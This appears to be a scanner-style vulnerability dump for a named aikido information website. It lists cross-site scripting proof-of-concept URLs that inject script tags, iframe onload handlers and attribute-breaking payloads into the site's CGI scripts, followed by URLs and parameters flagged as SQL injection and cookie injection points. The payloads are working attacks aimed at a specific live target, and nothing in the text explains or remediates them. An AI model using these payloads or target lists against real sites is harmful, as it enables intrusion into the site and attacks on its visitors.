aikidofaq.com

1. XSS
2.  
3. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
4.  
5. http://aikidofaq.com/cgi-bin/sensei.pl/"ns="alert(0x0001BC)
6. http://aikidofaq.com/cgi-bin/sensei.pl?'"--></style></script><script>alert(0x000458)</script>
7. http://aikidofaq.com/cgi-bin/bibliography.cgi/"ns="alert(0x0001C9)
8. http://aikidofaq.com/cgi-bin/bibliography.cgi?'"--></style></script><script>alert(0x00047A)</script>
9. http://aikidofaq.com/cgi-bin/aikido.pl/><iframe onload=alert(9)>
10. http://aikidofaq.com/cgi-bin/search_dict.pl?navn='"--></style></script><script>alert(0x000C5C)</script>
11. http://aikidofaq.com/cgi-bin/aikido.pl/"ns="alert(0x0008F3)
12. http://aikidofaq.com/cgi-bin/aikido.pl/Search?'"--></style></script><script>alert(0x000CA8)</script>
13. http://aikidofaq.com/cgi-bin/sensei.pl/><iframe onload=alert(9)>
14. http://aikidofaq.com/cgi-bin/sensei.pl/?'"--></style></script><script>alert(0x000D66)</script>
15. http://aikidofaq.com/cgi-bin/aikido.pl/Search?days=7&sort=WCRTESTINPUT000001<>%3c%3e%253c%253e&cookie=NEWS
16.  
17. * SQLi
18. http://aikidofaq.com/cgi-bin/aikido.pl/Search?days=7&sort=TIME&cookie=NEWS
19. Parameter cookie=NEWS
20. Type String
21. KWordActionURL Aikido
22. Vulnerability URL SQL INJECTION
23.  
24. http://aikidofaq.com/woda/data/sensei/_cache/?C=N;O=D
25. Parameter C=N;O=D
26. Type String
27. KWordActionURL Index
28. Vulnerability URL SQL INJECTION
29.  
30. * Cookie SQL Injection
31. http://aikidofaq.com/cgi-bin/aikido.pl/LoginOrRegister^referer=http%3a%2f%2faikidofaq%2ecom%2fcgi%2dbin%2faikido%2epl%2f
32. Parameter referer=http%3a%2f%2faikidofaq%2ecom%2fcgi%2dbin%2faikido%2epl%2f
33. Type String
34. KWordActionURL Aikido
35.  
36. http://aikidofaq.com/cgi-bin/bibliography.cgi/LoginOrRegister^referer=http%3a%2f%2faikidofaq%2ecom%2fcgi%2dbin%2fbibliography%2ecgi%2f
37. Parameter referer=http%3a%2f%2faikidofaq%2ecom%2fcgi%2dbin%2fbibliography%2ecgi%2f
38. Type String
39. KWordActionURL Aikido